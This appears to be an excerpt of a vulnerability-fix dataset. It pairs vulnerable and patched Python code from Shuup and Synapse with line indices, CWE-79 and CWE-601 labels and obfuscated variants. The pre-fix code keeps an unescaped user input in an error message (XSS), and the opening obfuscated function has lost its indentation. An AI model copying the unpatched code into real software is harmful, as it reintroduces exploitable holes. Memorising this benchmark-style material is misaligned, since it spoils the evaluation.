def FUNC_10(VAR_3, VAR_4=None, VAR_5=None, VAR_6=None, VAR_7=None, VAR_8=None):
import json, inspect
if not VAR_8: args = VAR_7 or ""
if VAR_5: # not called from a VAR_16 (from a page)
if not VAR_6: dn = VAR_5 # single
VAR_28 = VAR_24.get_doc(VAR_5, VAR_6)
else:
VAR_28 = VAR_24.get_doc(json.loads(VAR_4))
VAR_28._original_modified = VAR_28.modified
VAR_28.check_if_latest()
if not VAR_28.has_permission("read"):
VAR_24.msgprint(_("Not permitted"), raise_exception = True)
if not VAR_28:
return
try:
VAR_8 = json.loads(VAR_8)
except ValueError:
VAR_8 = args
VAR_23 = getattr(VAR_28, VAR_3)
is_whitelisted(getattr(VAR_23, '__func__', VAR_23))
try:
VAR_29 = inspect.getargspec(VAR_23)[0]
except ValueError:
VAR_29 = inspect.getfullargspec(VAR_23).args
if not VAR_29 or (len(VAR_29)==1 and VAR_29[0]=="self"):
VAR_30 = VAR_28.run_method(VAR_3)
elif "args" in VAR_29 or not isinstance(VAR_8, dict):
VAR_30 = VAR_28.run_method(VAR_3, VAR_8)
else:
VAR_30 = VAR_28.run_method(VAR_3, **VAR_8)
VAR_24.response.docs.append(VAR_28)
if not VAR_30:
return
if cint(VAR_24.form_dict.get('as_csv')):
build_csv_response(VAR_30, VAR_28.doctype.replace(' ', ''))
return
VAR_24.response['message'] = VAR_30
VAR_9 = FUNC_10
| [
1,
2,
3,
16,
21,
22,
28,
31,
32,
35,
37,
38,
40,
42,
46,
49,
50,
53,
63,
66,
69,
71,
74,
77,
79,
83,
85,
86,
90,
94,
98,
102,
107,
114,
123,
127,
144,
156,
158,
170,
181,
186,
189,
195,
214,
215,
224,
228,
24,
44,
117,
217
] | [
1,
2,
3,
5,
8,
13,
20,
21,
26,
27,
33,
36,
37,
40,
42,
43,
45,
47,
51,
54,
55,
58,
68,
71,
75,
77,
80,
83,
87,
92,
99,
103,
120,
132,
134,
146,
157,
162,
165,
171,
190,
191,
200,
204,
209,
211,
215,
220,
223,
226,
231,
234,
239,
242,
245,
248,
250,
253,
254,
258,
260,
261,
263,
29,
49,
193,
207
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django.http.response import HttpResponseRedirect
from shuup.utils.excs import Problem
from shuup.xtheme.editing import set_edit_mode
def handle_command(request, command):
"""
Internal dispatch function.
:param request: A request
:type request: django.http.HttpRequest
:param command: Command string
:type command: str
:return: A response
:rtype: django.http.HttpResponse
"""
path = request.POST.get("path") or request.META.get("HTTP_REFERER") or "/"
if command == "edit_on" or command == "edit_off":
set_edit_mode(request, command.endswith("_on"))
return HttpResponseRedirect(path)
def command_dispatch(request):
"""
Xtheme command dispatch view.
:param request: A request
:type request: django.http.HttpRequest
:return: A response
:rtype: django.http.HttpResponse
"""
command = request.POST.get("command")
if command:
response = handle_command(request, command)
if response:
return response
raise Problem("Error! Unknown command: `%r`" % command)
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django.http.response import HttpResponseRedirect
from django.utils.html import escape
from shuup.utils.excs import Problem
from shuup.xtheme.editing import set_edit_mode
def handle_command(request, command):
"""
Internal dispatch function.
:param request: A request
:type request: django.http.HttpRequest
:param command: Command string
:type command: str
:return: A response
:rtype: django.http.HttpResponse
"""
path = request.POST.get("path") or request.META.get("HTTP_REFERER") or "/"
if command == "edit_on" or command == "edit_off":
set_edit_mode(request, command.endswith("_on"))
return HttpResponseRedirect(path)
def command_dispatch(request):
"""
Xtheme command dispatch view.
:param request: A request
:type request: django.http.HttpRequest
:return: A response
:rtype: django.http.HttpResponse
"""
command = request.POST.get("command")
if command:
response = handle_command(request, command)
if response:
return response
raise Problem("Error! Unknown command: `%r`" % escape(command))
| xss | {
"code": [
" raise Problem(\"Error! Unknown command: `%r`\" % command)"
],
"line_no": [
45
]
} | {
"code": [
" raise Problem(\"Error! Unknown command: `%r`\" % escape(command))"
],
"line_no": [
46
]
} |
from django.http.response import HttpResponseRedirect
from shuup.utils.excs import Problem
from shuup.xtheme.editing import set_edit_mode
def FUNC_0(VAR_0, VAR_1):
VAR_2 = VAR_0.POST.get("path") or VAR_0.META.get("HTTP_REFERER") or "/"
if VAR_1 == "edit_on" or VAR_1 == "edit_off":
set_edit_mode(VAR_0, VAR_1.endswith("_on"))
return HttpResponseRedirect(VAR_2)
def FUNC_1(VAR_0):
VAR_1 = VAR_0.POST.get("command")
if VAR_1:
VAR_3 = FUNC_0(VAR_0, VAR_1)
if VAR_3:
return VAR_3
raise Problem("Error! Unknown VAR_1: `%r`" % VAR_1)
|
from django.http.response import HttpResponseRedirect
from django.utils.html import escape
from shuup.utils.excs import Problem
from shuup.xtheme.editing import set_edit_mode
def FUNC_0(VAR_0, VAR_1):
VAR_2 = VAR_0.POST.get("path") or VAR_0.META.get("HTTP_REFERER") or "/"
if VAR_1 == "edit_on" or VAR_1 == "edit_off":
set_edit_mode(VAR_0, VAR_1.endswith("_on"))
return HttpResponseRedirect(VAR_2)
def FUNC_1(VAR_0):
VAR_1 = VAR_0.POST.get("command")
if VAR_1:
VAR_3 = FUNC_0(VAR_0, VAR_1)
if VAR_3:
return VAR_3
raise Problem("Error! Unknown VAR_1: `%r`" % escape(VAR_1))
| [
1,
2,
3,
4,
5,
6,
7,
9,
12,
13,
17,
29,
30,
34,
46,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
32,
33,
34,
35,
36,
37,
38,
39
] | [
1,
2,
3,
4,
5,
6,
7,
10,
13,
14,
18,
30,
31,
35,
47,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
33,
34,
35,
36,
37,
38,
39,
40
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /profile paths."""
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
myid = "@1234ABCD:test"
PATH_PREFIX = "/_matrix/client/r0"
class MockHandlerProfileTestCase(unittest.TestCase):
""" Tests rest layer of profile management.
Todo: move these into ProfileTestCase
"""
@defer.inlineCallbacks
def setUp(self):
self.mock_resource = MockHttpResource(prefix=PATH_PREFIX)
self.mock_handler = Mock(
spec=[
"get_displayname",
"set_displayname",
"get_avatar_url",
"set_avatar_url",
"check_profile_query_allowed",
]
)
self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
Mock()
)
hs = yield setup_test_homeserver(
self.addCleanup,
"test",
http_client=None,
resource_for_client=self.mock_resource,
federation=Mock(),
federation_client=Mock(),
profile_handler=self.mock_handler,
)
async def _get_user_by_req(request=None, allow_guest=False):
return synapse.types.create_requester(myid)
hs.get_auth().get_user_by_req = _get_user_by_req
profile.register_servlets(hs, self.mock_resource)
@defer.inlineCallbacks
def test_get_my_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Frank")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Frank"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT", "/profile/%s/displayname" % (myid), b'{"displayname": "Frank Jr."}'
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "Frank Jr.")
@defer.inlineCallbacks
def test_set_my_name_noauth(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = AuthError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@4567:test"),
b'{"displayname": "Frank Jr."}',
)
self.assertTrue(400 <= code < 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_other_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Bob")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Bob"}, response)
@defer.inlineCallbacks
def test_set_other_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = SynapseError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@opaque:elsewhere"),
b'{"displayname":"bob"}',
)
self.assertTrue(400 <= code <= 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_my_avatar(self):
mocked_get = self.mock_handler.get_avatar_url
mocked_get.return_value = defer.succeed("http://my.server/me.png")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/avatar_url" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"avatar_url": "http://my.server/me.png"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_avatar(self):
mocked_set = self.mock_handler.set_avatar_url
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/avatar_url" % (myid),
b'{"avatar_url": "http://my.server/pic.gif"}',
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "http://my.server/pic.gif")
class ProfileTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
self.hs = self.setup_test_homeserver()
return self.hs
def prepare(self, reactor, clock, hs):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
def test_set_displayname(self):
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test"}),
access_token=self.owner_tok,
)
self.assertEqual(channel.code, 200, channel.result)
res = self.get_displayname()
self.assertEqual(res, "test")
def test_set_displayname_too_long(self):
"""Attempts to set a stupid displayname should get a 400"""
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test" * 100}),
access_token=self.owner_tok,
)
self.assertEqual(channel.code, 400, channel.result)
res = self.get_displayname()
self.assertEqual(res, "owner")
def get_displayname(self):
request, channel = self.make_request(
"GET", "/profile/%s/displayname" % (self.owner,)
)
self.assertEqual(channel.code, 200, channel.result)
return channel.json_body["displayname"]
class ProfilesRestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
room.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User owning the requested profile.
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
self.profile_url = "/profile/%s" % (self.owner)
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)
def test_no_auth(self):
self.try_fetch_profile(401)
def test_not_in_shared_room(self):
self.ensure_requester_left_room()
self.try_fetch_profile(403, access_token=self.requester_tok)
def test_in_shared_room(self):
self.ensure_requester_left_room()
self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
self.try_fetch_profile(200, self.requester_tok)
def try_fetch_profile(self, expected_code, access_token=None):
self.request_profile(expected_code, access_token=access_token)
self.request_profile(
expected_code, url_suffix="/displayname", access_token=access_token
)
self.request_profile(
expected_code, url_suffix="/avatar_url", access_token=access_token
)
def request_profile(self, expected_code, url_suffix="", access_token=None):
request, channel = self.make_request(
"GET", self.profile_url + url_suffix, access_token=access_token
)
self.assertEqual(channel.code, expected_code, channel.result)
def ensure_requester_left_room(self):
try:
self.helper.leave(
room=self.room_id, user=self.requester, tok=self.requester_tok
)
except AssertionError:
# We don't care whether the leave request didn't return a 200 (e.g.
# if the user isn't already in the room), because we only want to
# make sure the user isn't in the room.
pass
class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
def test_can_lookup_own_profile(self):
"""Tests that a user can lookup their own profile without having to be in a room
if 'require_auth_for_profile_requests' is set to true in the server's config.
"""
request, channel = self.make_request(
"GET", "/profile/" + self.requester, access_token=self.requester_tok
)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/displayname",
access_token=self.requester_tok,
)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/avatar_url",
access_token=self.requester_tok,
)
self.assertEqual(channel.code, 200, channel.result)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /profile paths."""
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
myid = "@1234ABCD:test"
PATH_PREFIX = "/_matrix/client/r0"
class MockHandlerProfileTestCase(unittest.TestCase):
""" Tests rest layer of profile management.
Todo: move these into ProfileTestCase
"""
@defer.inlineCallbacks
def setUp(self):
self.mock_resource = MockHttpResource(prefix=PATH_PREFIX)
self.mock_handler = Mock(
spec=[
"get_displayname",
"set_displayname",
"get_avatar_url",
"set_avatar_url",
"check_profile_query_allowed",
]
)
self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
Mock()
)
hs = yield setup_test_homeserver(
self.addCleanup,
"test",
federation_http_client=None,
resource_for_client=self.mock_resource,
federation=Mock(),
federation_client=Mock(),
profile_handler=self.mock_handler,
)
async def _get_user_by_req(request=None, allow_guest=False):
return synapse.types.create_requester(myid)
hs.get_auth().get_user_by_req = _get_user_by_req
profile.register_servlets(hs, self.mock_resource)
@defer.inlineCallbacks
def test_get_my_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Frank")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Frank"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT", "/profile/%s/displayname" % (myid), b'{"displayname": "Frank Jr."}'
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "Frank Jr.")
@defer.inlineCallbacks
def test_set_my_name_noauth(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = AuthError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@4567:test"),
b'{"displayname": "Frank Jr."}',
)
self.assertTrue(400 <= code < 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_other_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Bob")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Bob"}, response)
@defer.inlineCallbacks
def test_set_other_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = SynapseError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@opaque:elsewhere"),
b'{"displayname":"bob"}',
)
self.assertTrue(400 <= code <= 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_my_avatar(self):
mocked_get = self.mock_handler.get_avatar_url
mocked_get.return_value = defer.succeed("http://my.server/me.png")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/avatar_url" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"avatar_url": "http://my.server/me.png"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_avatar(self):
mocked_set = self.mock_handler.set_avatar_url
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/avatar_url" % (myid),
b'{"avatar_url": "http://my.server/pic.gif"}',
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "http://my.server/pic.gif")
class ProfileTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
self.hs = self.setup_test_homeserver()
return self.hs
def prepare(self, reactor, clock, hs):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
def test_set_displayname(self):
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test"}),
access_token=self.owner_tok,
)
self.assertEqual(channel.code, 200, channel.result)
res = self.get_displayname()
self.assertEqual(res, "test")
def test_set_displayname_too_long(self):
"""Attempts to set a stupid displayname should get a 400"""
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test" * 100}),
access_token=self.owner_tok,
)
self.assertEqual(channel.code, 400, channel.result)
res = self.get_displayname()
self.assertEqual(res, "owner")
def get_displayname(self):
request, channel = self.make_request(
"GET", "/profile/%s/displayname" % (self.owner,)
)
self.assertEqual(channel.code, 200, channel.result)
return channel.json_body["displayname"]
class ProfilesRestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
room.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User owning the requested profile.
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
self.profile_url = "/profile/%s" % (self.owner)
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)
def test_no_auth(self):
self.try_fetch_profile(401)
def test_not_in_shared_room(self):
self.ensure_requester_left_room()
self.try_fetch_profile(403, access_token=self.requester_tok)
def test_in_shared_room(self):
self.ensure_requester_left_room()
self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
self.try_fetch_profile(200, self.requester_tok)
def try_fetch_profile(self, expected_code, access_token=None):
self.request_profile(expected_code, access_token=access_token)
self.request_profile(
expected_code, url_suffix="/displayname", access_token=access_token
)
self.request_profile(
expected_code, url_suffix="/avatar_url", access_token=access_token
)
def request_profile(self, expected_code, url_suffix="", access_token=None):
request, channel = self.make_request(
"GET", self.profile_url + url_suffix, access_token=access_token
)
self.assertEqual(channel.code, expected_code, channel.result)
def ensure_requester_left_room(self):
try:
self.helper.leave(
room=self.room_id, user=self.requester, tok=self.requester_tok
)
except AssertionError:
# We don't care whether the leave request didn't return a 200 (e.g.
# if the user isn't already in the room), because we only want to
# make sure the user isn't in the room.
pass
class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
def test_can_lookup_own_profile(self):
"""Tests that a user can lookup their own profile without having to be in a room
if 'require_auth_for_profile_requests' is set to true in the server's config.
"""
request, channel = self.make_request(
"GET", "/profile/" + self.requester, access_token=self.requester_tok
)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/displayname",
access_token=self.requester_tok,
)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/avatar_url",
access_token=self.requester_tok,
)
self.assertEqual(channel.code, 200, channel.result)
| open_redirect | {
"code": [
" http_client=None,"
],
"line_no": [
66
]
} | {
"code": [
" federation_http_client=None,"
],
"line_no": [
66
]
} |
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
VAR_0 = "@1234ABCD:test"
VAR_1 = "/_matrix/client/r0"
class CLASS_0(unittest.TestCase):
@defer.inlineCallbacks
def FUNC_0(self):
self.mock_resource = MockHttpResource(prefix=VAR_1)
self.mock_handler = Mock(
spec=[
"get_displayname",
"set_displayname",
"get_avatar_url",
"set_avatar_url",
"check_profile_query_allowed",
]
)
self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
Mock()
)
VAR_5 = yield setup_test_homeserver(
self.addCleanup,
"test",
http_client=None,
resource_for_client=self.mock_resource,
federation=Mock(),
federation_client=Mock(),
profile_handler=self.mock_handler,
)
async def FUNC_20(VAR_9=None, VAR_10=False):
return synapse.types.create_requester(VAR_0)
VAR_5.get_auth().get_user_by_req = FUNC_20
profile.register_servlets(VAR_5, self.mock_resource)
@defer.inlineCallbacks
def FUNC_1(self):
VAR_11 = self.mock_handler.get_displayname
VAR_11.return_value = defer.succeed("Frank")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % (VAR_0), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"displayname": "Frank"}, VAR_13)
self.assertEquals(VAR_11.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def FUNC_2(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.return_value = defer.succeed(())
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT", "/profile/%s/displayname" % (VAR_0), b'{"displayname": "Frank Jr."}'
)
self.assertEquals(200, VAR_12)
self.assertEquals(VAR_14.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][2], "Frank Jr.")
@defer.inlineCallbacks
def FUNC_3(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.side_effect = AuthError(400, "message")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@4567:test"),
b'{"displayname": "Frank Jr."}',
)
self.assertTrue(400 <= VAR_12 < 499, msg="code %d is in the 4xx range" % (VAR_12))
@defer.inlineCallbacks
def FUNC_4(self):
VAR_11 = self.mock_handler.get_displayname
VAR_11.return_value = defer.succeed("Bob")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"displayname": "Bob"}, VAR_13)
@defer.inlineCallbacks
def FUNC_5(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.side_effect = SynapseError(400, "message")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@opaque:elsewhere"),
b'{"displayname":"bob"}',
)
self.assertTrue(400 <= VAR_12 <= 499, msg="code %d is in the 4xx range" % (VAR_12))
@defer.inlineCallbacks
def FUNC_6(self):
VAR_11 = self.mock_handler.get_avatar_url
VAR_11.return_value = defer.succeed("http://my.server/me.png")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/avatar_url" % (VAR_0), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"avatar_url": "http://my.server/me.png"}, VAR_13)
self.assertEquals(VAR_11.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def FUNC_7(self):
VAR_14 = self.mock_handler.set_avatar_url
VAR_14.return_value = defer.succeed(())
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/avatar_url" % (VAR_0),
b'{"avatar_url": "http://my.server/pic.gif"}',
)
self.assertEquals(200, VAR_12)
self.assertEquals(VAR_14.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][2], "http://my.server/pic.gif")
class CLASS_1(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
self.hs = self.setup_test_homeserver()
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
def FUNC_10(self):
VAR_9, VAR_15 = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test"}),
VAR_7=self.owner_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_16 = self.get_displayname()
self.assertEqual(VAR_16, "test")
def FUNC_11(self):
VAR_9, VAR_15 = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test" * 100}),
VAR_7=self.owner_tok,
)
self.assertEqual(VAR_15.code, 400, VAR_15.result)
VAR_16 = self.get_displayname()
self.assertEqual(VAR_16, "owner")
def FUNC_12(self):
VAR_9, VAR_15 = self.make_request(
"GET", "/profile/%s/displayname" % (self.owner,)
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
return VAR_15.json_body["displayname"]
class CLASS_2(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
room.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
VAR_17 = self.default_config()
VAR_17["require_auth_for_profile_requests"] = True
VAR_17["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(VAR_17=config)
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
self.profile_url = "/profile/%s" % (self.owner)
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)
def FUNC_13(self):
self.try_fetch_profile(401)
def FUNC_14(self):
self.ensure_requester_left_room()
self.try_fetch_profile(403, VAR_7=self.requester_tok)
def FUNC_15(self):
self.ensure_requester_left_room()
self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
self.try_fetch_profile(200, self.requester_tok)
def FUNC_16(self, VAR_6, VAR_7=None):
self.request_profile(VAR_6, VAR_7=access_token)
self.request_profile(
